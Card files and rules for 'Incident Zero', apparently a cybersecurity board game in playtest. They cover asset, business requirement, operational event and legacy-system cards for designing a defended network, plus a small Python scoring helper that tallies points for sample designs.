✓ Must Include: File Server or cloud file storage (OneDrive, SharePoint, Google Drive)
✓ Should Include: Network Segmentation to restrict access
✓ Should Include: Backup for ransomware recovery
✗ Failure Condition: No file storage = Asset unsatisfied
Business Function: User identity and access management
Criticality: Very High (foundational to all access control)
Impact if Down: Severe (cannot authenticate users, cannot operate)
Compliance Requirements: MFA (various standards), audit logging (GDPR, SOX)
Description: Centralized identity system (Active Directory, Azure AD, Okta) that authenticates users and grants access to resources. Identity compromise is game-over scenario—attacker with access to identity system can impersonate any user.
Network Requirements:
- Server: Domain Controller (SRV-05) in admin segment
- Protection: Network Segmentation Switch (SEC-08) — keep the DC in an isolated admin zone
- Optional: Second Domain Controller for redundancy (full price)
Security Considerations:
- Domain Controller is most sensitive system (compromise = total infrastructure access)
- Credential dumping attacks target DC (T-06 Mimikatz in Incident Response)
- Compromised DC allows attacker to create backdoor accounts
- Pass-the-hash attacks replay credentials from DC compromise
- DC must be in isolated segment with strict access control
Dependencies:
- Requires strong authentication (MFA for all DC access)
- Requires privileged access workstation (PAW) for admin access
- Requires immutable backup DC in separate location
- Requires audit logging of all DC changes
Team Design Validation:
✓ Must Include: Domain Controller (on-premises or Azure AD)
✓ Should Include: Network Segmentation (isolated admin zone)
✓ Should Include: Second Domain Controller for redundancy (optional, full price)
✗ Failure Condition: No identity system = the Identity requirement is unsatisfied (design incomplete)
Business Function: Software development and testing environment
Criticality: Medium (important but not production-critical)
Requirement Strength: Recommended (v2.2) — may be satisfied by overloading another server (+1 Budget per extra service)
Impact if Down: Low-Medium (development delays, but not immediate business impact)
Compliance Requirements: Secrets management (API keys not hardcoded), code scanning
Description: Development and testing infrastructure where software developers build and test applications. Development environment is often overlooked security risk because developers prioritize speed over security.
Network Requirements:
- Server: Development Server (SRV-06) in isolated development segment
- Protection: Firewall rules prevent dev→prod lateral movement
- Optional: Code repository (Git, GitHub) for version control
Security Considerations:
- Development servers often contain production-like data (compliance violation)
- Developers have broad access (weak access controls)
- Test credentials and API keys in source code
- Outdated/unpatched tools (developer tools not security tools)
- Development system as lateral movement springboard to production
- Source code repository is high-value target (intellectual property)
Dependencies:
- Requires separate database from production (never use production data in dev)
- Requires code review and secrets scanning
- Requires firewall rules isolating dev from production
- Requires MFA for code repository access
Team Design Validation:
✓ Should Include: Development Server, OR dev services overloaded onto another server (allowed, +1 Budget)
✓ Should Isolate: Dev network from production network
✓ Should Scan: Code for hardcoded secrets
✗ Failure Condition: Using production database in dev = data exposure/compliance violation
Business Function: Recovery capability for business continuity
Criticality: Very High (determines if business survives major attack/disaster)
Requirement Strength: Required (v2.2)
Impact if Down: Catastrophic (cannot recover from major incident)
Compliance Requirements: Backup retention, recovery SLA (RTO/RPO)
Description: Backup and disaster recovery capability. Organization needs ability to recover from data loss, ransomware, or disaster. Backup/recovery capability is often neglected until it's needed.
Network Requirements:
- Server: Backup Server (SRV-07) with off-site backups
- Protection: Immutable backups (WORM storage)
- 3-2-1 Strategy: 3 copies, 2 media types, 1 off-site
Security Considerations:
- Ransomware attacks target backup systems (T-11 in Incident Response)
- Backup must be immutable (attacker cannot modify backups)
- Backup must be off-site (local backup lost if data center destroyed)
- Backup testing must be regular (quarterly minimum)
- Backup credentials must be separate from domain (attacker cannot delete backups)
Dependencies:
- Requires off-site backup location (geographically separated)
- Requires immutable storage (WORM or cloud versioning)
- Requires regular backup restore testing
- Requires separate backup credentials
Team Design Validation:
✓ Must Include: Backup Server with off-site capability
✓ Must Test: Recovery procedures (quarterly)
✓ Must Implement: 3-2-1 strategy
✗ Failure Condition (v2.2): No Backup Server = automatic FAIL on the Disaster Recovery requirement, recorded as a CRITICAL gap (not an instant game loss — but ransomware in later modules becomes unrecoverable)
Business Function: Secure remote access for employees and contractors
Criticality: Medium (became High during COVID pandemic)
Impact if Down: Moderate (remote workers cannot work)
Compliance Requirements: MFA (various standards), encryption, audit logging
Description: VPN or similar remote access solution for employees working from home, traveling, or off-site. Remote access expands attack surface but is necessary for modern workforce.
Network Requirements:
- Device: VPN Gateway (SEC-05) at network perimeter
- Protection: MFA required for all VPN access
- Optional: Conditional access policies (restrict access by device/location)
Security Considerations:
- VPN is attractive attack target (Credential Abuse)
- Weak VPN credentials easily brute-forced (must use MFA)
- Compromised home computer connecting via VPN = internal network at risk
- VPN traffic must be encrypted
- VPN access must be logged and audited
Dependencies:
- Requires Domain Controller for user authentication
- Requires MFA (cannot rely on password alone)
- Requires endpoint security on remote devices
- Requires SIEM monitoring of VPN access
Team Design Validation:
✓ Should Include: VPN Gateway for remote access
✓ Must Implement: MFA for VPN access
✓ Should Monitor: VPN access logs in SIEM
✗ Failure Condition: Weak VPN security (no MFA) = credential attack vector
| Asset | Business Function | Criticality | Server | Key Defense |
|---|---|---|---|---|
| ASSET-01 | Email | High | SRV-01 | Email Gateway |
| ASSET-02 | Web | Medium | SRV-02 | WAF |
| ASSET-03 | Database | Very High | SRV-03 | Network Segmentation |
| ASSET-04 | File Storage | High | SRV-04 | Network Segmentation |
| ASSET-05 | Identity | Very High | SRV-05 | Network Segmentation |
| ASSET-06 | Development | Medium | SRV-06 | Network Isolation |
| ASSET-07 | Disaster Recovery | Very High | SRV-07 | Immutable Backups |
| ASSET-08 | VPN/Remote Access | Medium | SEC-05 | MFA |
Asset Cards drive network design decisions:
1. Display all 8 Asset Cards face-up on the table
2. Team designs network to satisfy each Asset
3. For each Asset, team must include appropriate Server and Defenses
4. Team validates: "Does our network design satisfy this Asset?"
Asset Cards provide scenario context:
- Threat Orchestrator refers to Assets when describing scenarios
- "Customer database is being exfiltrated" = reference ASSET-03
- "Email is compromised" = reference ASSET-01
- Assets help Blue Team understand what they're protecting
Asset Cards determine impact assessment:
- "How many critical systems are down?" = count "Very High" Assets affected
- Recovery priority = order by Asset criticality
- RTO (Recovery Time Objective) depends on which Assets must recover first
Financial Services Assets:
- Trading System (real-time market data)
- Payment Processing (external integrations)
- Audit Trail (regulatory requirement)
Healthcare Assets:
- Electronic Health Records (HIPAA-critical)
- Prescription Management (pharmacy integration)
- Patient Portal (external access)
Manufacturing Assets:
- Industrial Control Systems (safety-critical)
- Supply Chain Integration (vendor systems)
- Engineering Data (intellectual property)
Retail Assets:
- Point of Sale (transaction processing)
- Inventory Management (supplier integration)
- Customer Loyalty (marketing data)
After team completes network design, verify each Asset is satisfied. The checklist only names components that can actually be purchased from the Network Building decks; items in parentheses are recommended, not mandatory.
If any Asset is unsatisfied or under-defended:
- Network design is incomplete
- That Asset becomes a vulnerability in Incident Response
- That Asset affects recovery time in Disaster Recovery
Network Building Module: Asset Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/standalone/business-requirement-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Business Requirement Cards drive the Network Building standalone game. One card is revealed at the start of each turn (Phase 1) and represents what the business demands this quarter. Teams must satisfy the requirement by end of the stated deadline or take the score penalty.
Type: Growth Requirement: Marketing is launching a flagship product this quarter and needs a modern public website. Satisfied By: Web Server (7), OR web service hosted on a Cloud Workload (4) Score Impact: Missed: -5 points (launch flops; lost sales)
Type: Growth / M&A Requirement: The executive team is acquiring a customer-data company. Two million customer records must land somewhere safe by end of quarter. Satisfied By: Database Server (10), OR database service hosted on a Cloud Workload (4) — cloud-hosting the crown jewels is a recorded risk Score Impact: Missed: -10 points (deal falls through)
Type: Workforce Requirement: HR is rolling out flexible work. Staff need secure remote access to internal systems. Satisfied By: VPN Gateway (9) Score Impact: Missed: -3 points (staff use risky workarounds; morale dips)
Type: Workforce Requirement: The board mandates support for a fully remote workforce: secure access AND central identity for every remote login. Satisfied By: VPN Gateway (9) AND Domain Controller (12) Score Impact: Missed: -5 points (shadow IT spreads across home offices)
Type: Compliance Requirement: A new healthcare client puts you in HIPAA scope. Regulators expect recoverable data and isolated sensitive systems. Satisfied By: Backup Server (9) AND network segmentation (Network Segmentation Switch (10), or Segmented/Fully Isolated architecture) Score Impact: Missed: -10 points (client walks; compliance exposure)
Type: Compliance Requirement: You now process card payments. Cardholder data must live on a database that is walled off from the rest of the network. Satisfied By: Database Server (10) or cloud-hosted database, AND a Firewall (12) or Network Segmentation Switch (10) protecting it Score Impact: Missed: -10 points (acquirer threatens to pull card processing)
Type: Operations Requirement: Your biggest customer signs a contract with a 99.9% uptime SLA on your public services. A single box is no longer good enough. Satisfied By: Load Balancer (8), OR a second server duplicating any business-critical service (full price) Score Impact: Missed: -5 points (SLA credits eat the margin)
Type: Growth / M&A Requirement: The company you just bought needs its two core services absorbed into your infrastructure this quarter. Satisfied By: Two free capacity slots across your existing servers, OR deploy any new server this turn to host them (overloading is allowed at +1 Budget per extra service) Score Impact: Missed: -10 points (integration stalls; synergies evaporate)
Type: Operations Requirement: Headcount doubled and the email system is groaning. Add headroom. Satisfied By: Second Email Server (8), Load Balancer (8), OR email hosted on a Cloud Workload (4) Score Impact: Missed: -5 points (mail delays; missed customer requests)
**REQ-10: Security Audit**
- Type: Compliance
- Requirement: The audit committee orders an independent security audit. Auditors expect centralized visibility of security events.
- Satisfied By: SIEM (15), OR both IDS (10) and Email Gateway (6)
- Score Impact: Missed: -5 points (qualified audit opinion)

**REQ-11: IR Readiness**
- Type: Security
- Requirement: A competitor's breach is front-page news. The board demands demonstrable incident-detection capability.
- Satisfied By: IDS (10), IPS (14), OR SIEM (15)
- Score Impact: Missed: -10 points (board censure; CISO on thin ice)

**REQ-12: Ransomware Wave**
- Type: Security
- Requirement: A ransomware variant is tearing through your industry. You need recoverable backups AND a way to spot the attack.
- Satisfied By: Backup Server (9) AND at least one of IDS (10) / IPS (14) / SIEM (15)
- Score Impact: Missed: -20 points (you are one bad click from catastrophe)

**REQ-13: New Subsidiary Office**
- Type: Growth
- Requirement: A new regional office opens with no local infrastructure. Staff there must reach head-office systems securely.
- Satisfied By: VPN Gateway (9)
- Score Impact: Missed: -5 points (office runs on personal email and USB sticks)

**REQ-14: E-Commerce Expansion**
- Type: Growth
- Requirement: Sales moves online. You need a public web presence AND protection against the web attacks that come with taking payments.
- Satisfied By: Web Server (7) or cloud-hosted web, AND WAF (11)
- Score Impact: Missed: -5 points (checkout is either absent or a breach waiting to happen)

**REQ-15: Developer Hiring Spree**
- Type: Workforce
- Requirement: Engineering triples in size. Developers need somewhere to build and test that is not production.
- Satisfied By: Development Server (5), OR dev services overloaded onto an existing server (+1 Budget per extra service — allowed)
- Score Impact: Missed: -3 points (developers test in production; incidents follow)

**REQ-16: Records Retention**
- Type: Compliance
- Requirement: New regulation requires seven-year retention of business records: durable shared storage plus a recoverable copy.
- Satisfied By: File storage (File Server (6), or hosted on another server's capacity/overload) AND Backup Server (9)
- Score Impact: Missed: -5 points (regulator issues a compliance notice)

**REQ-17: Single Sign-On**
- Type: Operations
- Requirement: Password chaos across a dozen apps. Leadership wants one identity for everything.
- Satisfied By: Domain Controller (12)
- Score Impact: Missed: -5 points (password reuse everywhere; helpdesk drowning)

**REQ-18: Cyber-Insurance Renewal**
- Type: Security
- Requirement: Your insurer's renewal questionnaire wants proof of backups, phishing defense, and detection.
- Satisfied By: Backup Server (9) AND Email Gateway (6) AND at least one of IDS/IPS/SIEM
- Score Impact: Met: +5 points (premium drops). Missed: -5 points (premium spikes)

**REQ-19: Threat-Intel Pilot**
- Type: Security (Opportunity)
- Requirement: Your ISAC offers to feature any member running deception technology in its quarterly report.
- Satisfied By: Honeypot Decoy (7) or Honeypot Network (8)
- Score Impact: Met: +5 points (industry kudos). Missed: 0 points (opportunity passes; no penalty)

**REQ-20: Data-Center Consolidation**
- Type: Operations (Opportunity)
- Requirement: Finance wants the server-room footprint shrunk. Show that at least one business service runs in the cloud.
- Satisfied By: Any service hosted on a Cloud Workload (4)
- Score Impact: Met: +3 points (opex savings). Missed: -3 points (facilities costs balloon)
| Card | Requirement | Satisfied By | Missed | Met Bonus |
|---|---|---|---|---|
| REQ-01 | Product Launch Website | Web Server or cloud web | -5 | — |
| REQ-02 | Customer Data Acquisition | Database (dedicated or cloud) | -10 | — |
| REQ-03 | Work-From-Home Program | VPN Gateway | -3 | — |
| REQ-04 | Remote Workforce Mandate | VPN Gateway + Domain Controller | -5 | — |
| REQ-05 | HIPAA Compliance | Backup + segmentation | -10 | — |
| REQ-06 | PCI Cardholder Data | Database + Firewall/Segmentation | -10 | — |
| REQ-07 | 99.9% Uptime SLA | Load Balancer or duplicate server | -5 | — |
| REQ-08 | M&A Network Integration | 2 spare slots or new server | -10 | — |
| REQ-09 | Scale Email System | 2nd Email Server / LB / cloud email | -5 | — |
| REQ-10 | Security Audit | SIEM, or IDS + Email Gateway | -5 | — |
| REQ-11 | IR Readiness | IDS, IPS, or SIEM | -10 | — |
| REQ-12 | Ransomware Wave | Backup + detection | -20 | — |
| REQ-13 | New Subsidiary Office | VPN Gateway | -5 | — |
| REQ-14 | E-Commerce Expansion | Web + WAF | -5 | — |
| REQ-15 | Developer Hiring Spree | Dev Server or overload | -3 | — |
| REQ-16 | Records Retention | File storage + Backup | -5 | — |
| REQ-17 | Single Sign-On | Domain Controller | -5 | — |
| REQ-18 | Cyber-Insurance Renewal | Backup + Email Gateway + detection | -5 | +5 |
| REQ-19 | Threat-Intel Pilot | Honeypot | 0 | +5 |
| REQ-20 | Data-Center Consolidation | Any cloud-hosted service | -3 | +3 |
Requirements are deliberately lumpy: some are satisfied by things every sane design already has (web, database), others punish narrow builds (detection, deception, redundancy). Teams that spend everything in turn 1 have no reserve when REQ-12 lands.
Network Building Standalone: Business Requirement Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/standalone/operational-event-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Operational Event Cards are the random incidents, windfalls, and headaches of running infrastructure. One card is revealed each turn (Phase 2) of the Network Building standalone game, right after the Business Requirement.
**EVT-01: Email Server Failure**
- Type: Outage
- Effect: Your email server dies mid-quarter. Choose one:
  - Repair: Pay 5 Budget (emergency callout)
  - Ignore: -10 points (email down all quarter; users furious)
- Mitigated By: A second Email Server, or email hosted on a Cloud Workload — the redundant/cloud service carries the load: no cost, no penalty
- No email service at all? Nothing to break — but you already have bigger problems (see Capability scoring)

**EVT-02: Traffic Spike**
- Type: Load
- Effect: Your product goes viral overnight. Public services are hammered.
  - Prepared (Load Balancer, CDN, or a duplicated web service): +5 points (you rode the wave; sales boom)
  - Unprepared: -5 points (site down during your biggest day)
- Mitigated By: Load Balancer (8), CDN (expansion CLOUD-04), or redundant web hosting

**EVT-03: Phishing Wave**
- Type: Attack
- Effect: A targeted phishing campaign hits every inbox in the company.
  - Email Gateway deployed: +5 points (campaign filtered; nice catch)
  - No Email Gateway: -10 points (three credential sets stolen)
- Mitigated By: Email Gateway (6)

**EVT-04: Cloud Vendor Outage**
- Type: Outage
- Effect: Your cloud provider has a region-wide outage this quarter.
  - If any required business service runs only in the cloud: -5 points (service dark; SLA breached)
  - Cloud services with an on-prem twin, or no cloud usage: no effect
- Mitigated By: On-prem redundancy for cloud-hosted services, or an all-on-prem design
- Lesson: Cloud is cheap, but concentration risk is real

**EVT-05: Budget Cut**
- Type: Finance
- Effect: Fiscal crisis. Lose 5 Budget immediately (to a minimum of 0).
- Mitigated By: Nothing — but teams holding a contingency reserve absorb it without changing plans

**EVT-06: Emergency Funds**
- Type: Finance
- Effect: A surprise rebate lands. Gain +10 Budget (one time).
- Mitigated By: N/A (enjoy it)

**EVT-07: Security Grant**
- Type: Finance
- Effect: A government cyber-resilience grant is available to organizations with recoverable backups.
  - Backup Server deployed: Gain +5 Budget
  - No Backup Server: Nothing (you don't qualify)
- Mitigated By: N/A — this one rewards good hygiene

**EVT-08: File Server Filling Up**
- Type: Capacity
- Effect: Shared storage hits 98% full. Choose one this turn:
  - Add capacity: Deploy any server to host file storage, or overload an existing server (+1 Budget per extra service)
  - Ignore: -5 points (service degradation; work grinds)
- Mitigated By: Spare capacity anywhere in your design (assign file storage to it at no cost)
- No file storage service at all? No effect — and no file-storage capability either

**EVT-09: Honeypot Triggers**
- Type: Attack (Detected?)
- Effect: Someone has been quietly probing your network.
  - Honeypot Decoy or Honeypot Network deployed: +5 points (intruder caught red-handed in the decoy; access cut)
  - No honeypot: Nothing visible happens. Nothing visible ever happens. (No penalty — this time)
- Mitigated By: N/A — this is deception's payday

**EVT-10: Insider Snooping**
- Type: Attack
- Effect: An employee is browsing systems far outside their role.
  - SIEM deployed OR network segmentation in place: +5 points (caught early / blocked at the zone boundary)
  - Neither: -5 points (months of quiet data access before anyone notices)
- Mitigated By: SIEM (15) or Network Segmentation Switch (10) / segmented architecture

**EVT-11: Ransomware Strikes**
- Type: Attack (Severe)
- Effect: Ransomware detonates on an internal system.
  - Backup Server deployed: Pay 3 Budget for restore effort; if you also have detection (IDS/IPS/SIEM), you contained it fast: +5 points
  - No Backup Server: -20 points (pay the ransom or lose the data — either way it's ugly)
- Mitigated By: Backup Server (9); detection reduces blast radius

**EVT-12: IT Staff Burnout**
- Type: Operations
- Effect: The ops team is running on fumes. This turn you may deploy at most ONE component. (Handling the turn's Business Requirement with an already-deployed component is fine.)
- Mitigated By: Designs that are already complete — teams who front-loaded their build barely notice

**EVT-13: Vendor Promotion**
- Type: Opportunity
- Effect: A security vendor is clearing stock. The next security device you deploy this turn costs 2 less (minimum cost 1).
- Mitigated By: N/A — pure opportunity; skip it if nothing on the list fits your design

**EVT-14: New Hire Remote Access**
- Type: Workforce
- Effect: A key new hire works from another city and starts Monday.
  - VPN Gateway deployed: No effect (onboarding is routine)
  - No VPN Gateway: -3 points (they quit in week two, or worse: they improvise)
- Mitigated By: VPN Gateway (9)

**EVT-15: Hardware Recall**
- Type: Outage
- Effect: A vendor recalls a faulty component. Pick one of your on-prem servers (Threat Orchestrator picks if you won't):
  - Pay 3 Budget for expedited replacement, OR
  - That server is offline this quarter — any requirement it alone satisfies counts as unmet this turn
- Mitigated By: Redundant servers or cloud-hosted twins (the twin covers the outage: no cost, no penalty). All-cloud designs are unaffected

**EVT-16: Quiet Quarter**
- Type: Respite
- Effect: Nothing breaks. Nobody attacks. Finance leaves you alone. Use the breathing room to review your gaps.
- Mitigated By: N/A
| Card | Event | Effect (Unmitigated) | Mitigated By |
|---|---|---|---|
| EVT-01 | Email Server Failure | Pay 5 or -10 pts | Redundant/cloud email |
| EVT-02 | Traffic Spike | -5 pts (or +5 if ready) | LB / CDN / redundant web |
| EVT-03 | Phishing Wave | -10 pts (or +5 if ready) | Email Gateway |
| EVT-04 | Cloud Vendor Outage | -5 pts if cloud-only service | On-prem redundancy |
| EVT-05 | Budget Cut | -5 Budget | Contingency reserve |
| EVT-06 | Emergency Funds | +10 Budget | — |
| EVT-07 | Security Grant | +5 Budget if Backup | — |
| EVT-08 | File Server Filling Up | Buy capacity or -5 pts | Spare capacity |
| EVT-09 | Honeypot Triggers | +5 pts if honeypot | — |
| EVT-10 | Insider Snooping | -5 pts (or +5 if ready) | SIEM / segmentation |
| EVT-11 | Ransomware Strikes | -20 pts | Backup (+ detection: +5) |
| EVT-12 | IT Staff Burnout | Max 1 deploy this turn | Completed builds |
| EVT-13 | Vendor Promotion | Next device -2 cost | — |
| EVT-14 | New Hire Remote Access | -3 pts | VPN Gateway |
| EVT-15 | Hardware Recall | Pay 3 or server offline | Redundancy / cloud |
| EVT-16 | Quiet Quarter | Nothing | — |
Events reward the same things the scoring rewards — redundancy, detection, backups, and a contingency reserve — so mitigation is never wasted spend. The nastiest card (EVT-11) is exactly why zero-reserve builds and backup-free builds both hurt.
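To make the "lumpy" requirements and the event mitigations concrete, here is a small scoring helper, added as an example and not part of the Incident Zero rules text: it encodes the Satisfied By conditions of REQ-10..REQ-20 and four Operational Event cards, then runs two constructed designs through the same three turns. The Design structure, component names and sample designs are this example's assumptions; the point and Budget values are the ones printed on the cards.

```python
"""Scoring helper for the Network Building standalone (added example, not part
of the Incident Zero rules). Encodes the Satisfied By conditions of REQ-10..20
and four Operational Event cards. The Design model, component names and the
sample designs are assumptions of this example; the point and Budget values
are the ones printed on the cards."""
from collections import Counter
from dataclasses import dataclass, field

@dataclass
class Design:
    components: Counter                                     # on-prem components, name -> count
    cloud_services: set = field(default_factory=set)        # services on a Cloud Workload, e.g. {"web"}
    overloaded_services: set = field(default_factory=set)   # services squeezed onto an existing server
    reserve: int = 0                                        # unspent Budget held back as contingency
    points: int = 0

    def has(self, name, n=1):
        return self.components[name] >= n
    def detection(self):                                    # "at least one of IDS/IPS/SIEM"
        return any(self.has(x) for x in ("IDS", "IPS", "SIEM"))
    def web(self):                                          # Web Server or cloud-hosted web
        return self.has("Web Server") or "web" in self.cloud_services
    def file_storage(self):                                 # File Server or file storage on another server
        return self.has("File Server") or "file" in self.overloaded_services

# card -> (satisfied-by predicate, points if missed, points if met)
REQUIREMENTS = {
    "REQ-10": (lambda d: d.has("SIEM") or (d.has("IDS") and d.has("Email Gateway")), -5, 0),
    "REQ-11": (lambda d: d.detection(), -10, 0),
    "REQ-12": (lambda d: d.has("Backup Server") and d.detection(), -20, 0),
    "REQ-13": (lambda d: d.has("VPN Gateway"), -5, 0),
    "REQ-14": (lambda d: d.web() and d.has("WAF"), -5, 0),
    "REQ-15": (lambda d: d.has("Development Server") or "dev" in d.overloaded_services, -3, 0),
    "REQ-16": (lambda d: d.file_storage() and d.has("Backup Server"), -5, 0),
    "REQ-17": (lambda d: d.has("Domain Controller"), -5, 0),
    "REQ-18": (lambda d: d.has("Backup Server") and d.has("Email Gateway") and d.detection(), -5, 5),
    "REQ-19": (lambda d: d.has("Honeypot Decoy") or d.has("Honeypot Network"), 0, 5),
    "REQ-20": (lambda d: bool(d.cloud_services), -3, 3),
}

def resolve_requirement(d, card):
    """Apply a Business Requirement card; returns the points delta."""
    satisfied_by, missed, met = REQUIREMENTS[card]
    delta = met if satisfied_by(d) else missed
    d.points += delta
    return delta

def resolve_event(d, card, repair=True):
    """Apply one Operational Event card; returns (points delta, Budget delta).
    Only four cards are encoded. `repair` is the player's choice on EVT-01; this
    example assumes the repair cannot be chosen when the reserve is below 5."""
    pts = bud = 0
    if card == "EVT-01":                                    # Email Server Failure
        redundant = d.has("Email Server", 2) or "email" in d.cloud_services
        if d.has("Email Server") and not redundant:         # no email server: nothing to break
            if repair and d.reserve >= 5:
                bud = -5
            else:
                pts = -10
    elif card == "EVT-03":                                  # Phishing Wave
        pts = 5 if d.has("Email Gateway") else -10
    elif card == "EVT-05":                                  # Budget Cut: lose 5, floor at 0
        bud = -min(5, d.reserve)
    elif card == "EVT-11":                                  # Ransomware Strikes
        if d.has("Backup Server"):
            bud = -3                                        # restore effort (assumed payable; card is silent on an empty reserve)
            pts = 5 if d.detection() else 0
        else:
            pts = -20
    else:
        raise ValueError(f"{card} is not encoded in this example")
    d.points += pts
    d.reserve += bud
    return pts, bud

def play(d, turns, repair=True):
    """turns: (requirement card, event card) per turn, in Phase 2 reveal order.
    Returns (points, remaining reserve)."""
    for req, evt in turns:
        resolve_requirement(d, req)
        resolve_event(d, evt, repair)
    return d.points, d.reserve

# Constructed sample designs: one spent everything in turn 1 and skipped backups,
# one kept a reserve and bought Backup + SIEM.
def all_in_no_backup():
    return Design(Counter({"Web Server": 1, "WAF": 1, "Email Server": 1, "Email Gateway": 1,
                           "IDS": 1, "Domain Controller": 1, "VPN Gateway": 1,
                           "Development Server": 1}), reserve=0)

def balanced_with_reserve():
    return Design(Counter({"Backup Server": 1, "Email Server": 1, "Email Gateway": 1,
                           "SIEM": 1, "VPN Gateway": 1}),
                  cloud_services={"web"}, overloaded_services={"dev", "file"}, reserve=10)

SAMPLE_TURNS = [("REQ-12", "EVT-05"), ("REQ-18", "EVT-11"), ("REQ-20", "EVT-03")]
```

Running `play(all_in_no_backup(), SAMPLE_TURNS)` ends at -43 points, while `play(balanced_with_reserve(), SAMPLE_TURNS)` ends at +18 with 2 Budget still in reserve; REQ-12 and EVT-11 alone account for 40 of the gap.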
Network Building Standalone: Operational Event Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/expansion-deck/legacy-systems.md
Version: 2.1 - Balanced & Refined Edition Last Updated: October 2025
Legacy System Cards extend the Network Building module with specialized systems that many organizations still operate but cannot easily patch or upgrade.
**LEGACY-01: Mainframe**
- Type: Legacy Business-Critical Infrastructure
- Cost: 15 Budget (expensive to operate)
- Complexity: 4/4 (extremely complex, specialized expertise required)
- Availability Requirement: 99.95% (financial/mission-critical)
- Supported Operating System: Mainframe OS (z/OS, VSE, VM), not patchable

Description: Large centralized mainframe computer running business-critical applications. Banks, insurance companies, government agencies, and utilities often depend on mainframes for core operations. Mainframes are designed for availability and stability, but their security model is outdated (it predates internet security concerns).

Key Characteristics:
- Age: Often 20-30+ years old
- Software: Custom applications written in COBOL or other legacy languages
- Security: Perimeter security model (assumes all internal traffic is trusted)
- Expertise: Few experts remain (knowledge leaving the industry)
- Vendor Support: Vendor may no longer exist; in-house expertise critical
- Cost of Replacement: $5M-100M+ (impossible to replace)

Key Concerns:
- No regular security patches available (vendor EOL)
- Known CVEs published but cannot be patched
- Legacy protocols (unencrypted connections, weak authentication)
- Access control systems predate modern security standards
- Directly connected to corporate network (not isolated)
- Often contains the entire organization's critical data
- Business process depends on it (replacement would take years)

Defense Strategy (Cannot Fix, Must Isolate):
- Network Isolation: Mainframe in restricted segment, minimal connectivity
- Firewall Rules: Only authorized systems can connect to specific ports
- Monitoring: SIEM must monitor all mainframe connections (detect anomalies)
- Assumption of Breach: Assume mainframe will be compromised; defend everything else
- No Direct User Access: Users should not directly access mainframe (access via secure application tier)
- Log Aggregation: All mainframe activities logged centrally (immutable audit trail)

Network Interactions:
- Requires: Firewall rules isolating mainframe
- Requires: Network Segmentation to restrict access
- Requires: SIEM monitoring for anomaly detection
- Incompatible with: Direct internet access (perimeter firewall only)
- Incompatible with: Cloud integration (data residency and connectivity issues)

Incident Response Impact:
- If mainframe is compromised, entire organization may be compromised
- Mainframe compromise may be immediate game-loss in Incident Response
- Legacy authentication means attacker can move freely once inside
- Mainframe contains sufficient data to be primary exfiltration target

Team Design Validation:
- ✓ If including mainframe: must include Network Segmentation + Firewall
- ✓ Must include SIEM for monitoring
- ✗ Failure: Direct user access to mainframe increases risk
- ✗ Failure: Cloud connectivity to mainframe violates security boundary
**LEGACY-02: Custom Application**
- Type: Legacy Business-Critical Software
- Cost: 8 Budget (application licensing/support)
- Complexity: 3/4 (difficult to update or replace)
- Availability Requirement: 99% (business depends on it)
- Operating System: Windows Server 2008/2012, or older Linux, or proprietary OS

Description: Specialized business application written by an external vendor or in-house team that is no longer maintained. The application may be:
- Accounting system (custom financial software)
- Manufacturing control system (production scheduling)
- Insurance claims system
- Legal case management system
- ERP (Enterprise Resource Planning) system

The application is mission-critical but:
- Vendor no longer provides updates (company went out of business, or stopped supporting it)
- Cost to replace: $500K-$5M+ (economically infeasible)
- Business process deeply embedded in application (replacement would require major restructuring)
- Knowledge of application is scarce (original developers left, documentation poor)

Key Characteristics:
- Age: Often 10-20 years old
- Language: Written in outdated languages (Visual Basic 6, old Java, COBOL)
- Vendor: Vendor may no longer exist; purchased "as-is"
- Customization: Heavily customized for organization (not standard product)
- Expertise: Few people understand the code
- Database: Proprietary or very old database (SQL Server 2005, Oracle 10g, etc.)
- Integration: Deeply integrated into business workflow

Key Concerns:
- Application may contain hardcoded credentials
- Application may store passwords in plaintext
- Application may use unencrypted connections to database
- Application may have SQL injection vulnerabilities (pre-2005 development)
- Application may lack audit logging
- Upgrading operating system may break application
- Patches to operating system may be incompatible with application
- Security testing tools may break application

Defense Strategy (Isolate and Monitor):
- Application Server Isolation: Application in restricted segment
- Database Isolation: Application database encrypted and access-controlled
- Network Firewall: Only users/systems needing application can access it
- No Direct Internet Access: Application never exposed to internet
- SIEM Monitoring: All application access logged and monitored
- Assumption: Assume application has SQL injection or similar vulnerabilities; defend database
- Access Control: Limit who can use application (risk vs. benefit analysis)

Network Interactions:
- Requires: Application Server (SRV-06 or custom server)
- Requires: Database Server isolated from other systems
- Requires: Firewall rules limiting access
- Requires: SIEM monitoring application access
- Incompatible with: Cloud hosting (licensing, data residency issues)

Incident Response Impact:
- Custom application vulnerability could be exploited for lateral movement
- Application database compromise exposes sensitive business data
- Application logs may be missing or inaccessible
- Attacker may extract application source code

Team Design Validation:
- ✓ If including custom application: must isolate application + database
- ✓ Must limit user access (principle of least privilege)
- ✓ Must monitor application access in SIEM
- ✗ Failure: Direct internet access to application increases attack surface
- ✗ Failure: Weak access controls allow unauthorized application access
**LEGACY-03: Industrial Control**
- Type: Operational Technology (OT) / Safety-Critical
- Cost: 12 Budget (specialized equipment)
- Complexity: 4/4 (extremely specialized, safety implications)
- Availability Requirement: 99.9%+ (safety-critical, cannot fail)
- Operating System: Proprietary industrial OS, real-time OS, or very old Linux

Description: Specialized system that controls physical machinery, manufacturing processes, power generation, utilities, or other critical infrastructure. Examples:
- Manufacturing: Assembly line control, robotic systems
- Utilities: Power distribution, water treatment, smart grid
- Building Systems: HVAC, access control, fire systems
- Transportation: Traffic signals, rail systems

Industrial Control Systems (ICS) are purpose-built for reliability and real-time control, not information security. They predate cybersecurity concerns.

Key Characteristics:
- Purpose: Controls physical machinery or critical infrastructure
- Real-time: Must respond in milliseconds (cannot tolerate latency)
- Reliability: Designed for 99.99%+ availability
- Security: Predates modern security (no authentication, no encryption)
- Isolation: Historically air-gapped (not connected to corporate network)
- Expertise: Requires specialized engineering expertise (electrical, mechanical, control systems)
- Cost of Downtime: $10K-$1M+ per minute of downtime
- Lifecycle: 10-30 year lifespan (different from IT systems)

Key Concerns (from IT Perspective):
- Cannot be patched (real-time systems cannot tolerate OS updates)
- Cannot tolerate intrusion detection (latency would affect operations)
- Cannot install EDR/antivirus (would slow down real-time responses)
